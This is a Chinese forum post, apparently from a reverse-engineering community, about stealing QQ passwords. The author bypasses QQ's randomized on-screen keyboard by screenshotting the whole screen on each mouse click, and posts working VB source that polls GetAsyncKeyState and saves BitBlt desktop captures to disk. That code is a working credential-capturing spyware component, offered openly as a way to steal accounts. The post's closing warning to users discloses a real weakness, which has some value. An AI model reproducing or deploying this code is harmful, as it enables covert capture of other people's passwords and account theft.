N久以前研究过盗号的程序,做过一个钩子,在QQ上做试验,没想到截过来的都是乱七八糟的东西。然后又用GetWindowText想直接从密码框里捞密码,结果又是乱的。。。看来腾讯对此还是下了功夫的。而且还加了另一道防线——屏幕小键盘。仔细研究一下,小键盘按键的排列还是随机的,看起来很安全。不过实际真是这样吗?这道“防线”是防住了盗号者的来犯,还是给了他们一个捷径呢?
今天我想起用屏幕截图的方式盗Q密,开始还以为腾讯会对此做出防备,后来又想腾讯再强也不会强到这种地步。于是就干起来。干了半个小时,看来腾讯真还是有疏忽。上几张图:
VB源码:
Private Declare Function BitBlt Lib "gdi32" _
(ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, _
ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, _
ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare Function GetDC Lib "user32" (ByVal hWnd As Long) As Long
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Const SRCCOPY = &HCC0020Private Sub Form_Load()
Picture1.AutoRedraw = True
Picture1.Height = Screen.Height: Picture1.Width = Screen.Width
End Sub
Private Sub Timer1_Timer()
If GetAsyncKeyState(1) = -32767 Then
Static I
I = I + 1
BitBlt Picture1.hDC, 0, 0, Screen.Width, Screen.Height, GetDC(0), 0, 0, SRCCOPY
SavePicture Picture1.Image, "D:\pic\" & I & ".jpeg"
End If
End Sub
看来在腾讯修漏洞之前,还是老老实实用大键盘输吧,谁知道哪天有人把你号盗走?
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)